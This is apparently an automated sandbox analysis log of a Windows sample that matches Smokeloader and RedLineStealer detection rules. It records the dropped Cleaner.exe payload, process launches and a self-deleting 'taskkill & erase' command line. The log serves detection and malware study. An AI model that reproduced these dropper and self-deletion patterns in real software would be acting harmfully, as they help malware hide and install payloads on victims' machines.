                  Source: 00000000.00000000.308781752.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.318868933.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.303421378.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.345921160.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.308709997.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.352027898.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.302874171.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.324186328.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 528
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe Code function: 22_2_00007FF9A58D1D61
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe Code function: 22_2_00007FF9A58DA91D
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe Code function: 22_2_00007FF9A58D553E
                  Source: file.exe Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: file.exe, 00000000.00000003.396800531.0000000003B36000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.390225598.0000000003712000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.393566637.000000000371E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.395142031.0000000003B1B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.392148582.00000000038FD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.389580944.0000000003AC7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.398066889.0000000003B63000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.394103173.0000000003913000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.392869347.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.397700050.0000000003934000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.396385601.0000000003924000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.395883295.000000000371B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.397228041.0000000003718000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.399409682.0000000003716000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\soft[1] C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
                  Source: Cleaner.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: soft[1].0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 528
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 700
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 724
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 760
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 768
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 848
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 840
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1032
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1292
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe"
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1552
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe"
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f
                  Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: Cleaner.lnk.0.dr LNK file: ..\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
                  Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "file.exe")
                  Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FMJ
                  Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0
                  Source: classification engine Classification label: mal88.troj.winEXE@21/51@1/5
                  Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3196
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4744:120:WilError_01
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4392:120:WilError_01
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: ^\C:\car.pdb source: file.exe
                  Source: Binary string: C:\car.pdb source: file.exe
                  Source: Cleaner.exe.0.dr | Static PE information: 0xEAE49AF1 [Wed Nov 17 16:40:17 2094 UTC]
                  Source: initial sample | Static PE information: section name: .text entropy: 7.920922021912582
                  Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\dll[1]
                  Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\soft[1]
                  Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Bunifu_UI_v1.5.3.dll
                  Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
                  Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\file.exe TID: 4516Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\file.exe - Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Bunifu_UI_v1.5.3.dll
                  Source: C:\Users\user\Desktop\file.exe - Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\dll[1]
                  Source: C:\Users\user\Desktop\file.exe - Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\file.exe - Thread delayed: delay time: 60000
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe - File Volume queried: C:\ FullSizeInformation
                  Source: Cleaner.exe, 00000016.00000002.566457832.000001CFE1A49000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe - Process token adjusted: Debug
                  Source: C:\Windows\SysWOW64\taskkill.exe - Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\file.exe - Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe - Memory allocated: page read and write | page guard
                  Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f
                  Source: C:\Users\user\Desktop\file.exe - Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
                  Source: C:\Users\user\Desktop\file.exe - Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
                  Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe"
                  Source: file.exe, 00000000.00000000.313674237.000000000251E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.309268377.000000000251E000.00000004.00000010.00020000.00000000.sdmp - Binary or memory string: Program Manager
                  Source: file.exe, 00000000.00000000.313674237.000000000251E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.309268377.000000000251E000.00000004.00000010.00020000.00000000.sdmp - Binary or memory string: program manager
                  Source: file.exe, 00000000.00000000.313674237.000000000251E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.309268377.000000000251E000.00000004.00000010.00020000.00000000.sdmp - Binary or memory string: F.program manager
                  Source: C:\Users\user\Desktop\file.exe - Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe - Queries volume information: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe - Queries volume information: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Bunifu_UI_v1.5.3.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
